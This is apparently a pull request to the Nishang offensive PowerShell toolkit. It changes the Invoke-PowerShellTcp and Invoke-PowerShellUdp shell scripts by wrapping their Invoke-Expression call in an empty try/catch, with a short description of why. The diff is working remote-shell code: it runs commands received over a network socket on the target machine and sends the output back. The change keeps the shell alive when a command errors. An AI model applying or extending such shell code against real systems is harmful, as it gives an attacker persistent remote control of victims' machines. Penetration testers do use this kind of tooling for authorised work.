### PR TITLE
Update Invoke-PowerShellTcp/Udp Shells

### DIFF
--- a/Shells/Invoke-PowerShellTcp.ps1
+++ b/Shells/Invoke-PowerShellTcp.ps1
@@ -92,8 +92,15 @@ https://github.com/samratashok/nishang
             $EncodedText = New-Object -TypeName System.Text.ASCIIEncoding
             $data = $EncodedText.GetString($bytes,0, $i)
         
-            #Execute the command on the target.
-            $sendback = (Invoke-Expression -Command $data 2>&1 | Out-String )
+            # Catch and swallow any exceptions to prevent closing the shell
+            try
+            {
+                #Execute the command on the target.
+                $sendback = (Invoke-Expression -Command $data 2>&1 | Out-String )
+            }
+            catch
+            {
+            }
 
             $sendback2  = $sendback + 'PS ' + (Get-Location).Path + '> '
             $x = ($error[0] | Out-String)

--- a/Shells/Invoke-PowerShellUdp.ps1
+++ b/Shells/Invoke-PowerShellUdp.ps1
@@ -110,7 +110,15 @@ https://github.com/samratashok/nishang
     {
         $receivebytes = $client.Receive([ref]$endpoint)
         $returndata = ([text.encoding]::ASCII).GetString($receivebytes)
-        $result = (Invoke-Expression -Command $returndata 2>&1 | Out-String )
+        
+        # Catch and swallow any exceptions to prevent closing the shell
+        try
+        {
+            $result = (Invoke-Expression -Command $returndata 2>&1 | Out-String )
+        }
+        catch
+        {
+        }
 
         $sendback = $result +  'PS ' + (Get-Location).Path + '> '
         $x = ($error[0] | Out-String)


### PR DESCRIPTION
Recommend adding a try catch so the shell doesn't abort when an incorrect or invalid command is attempted by the client. 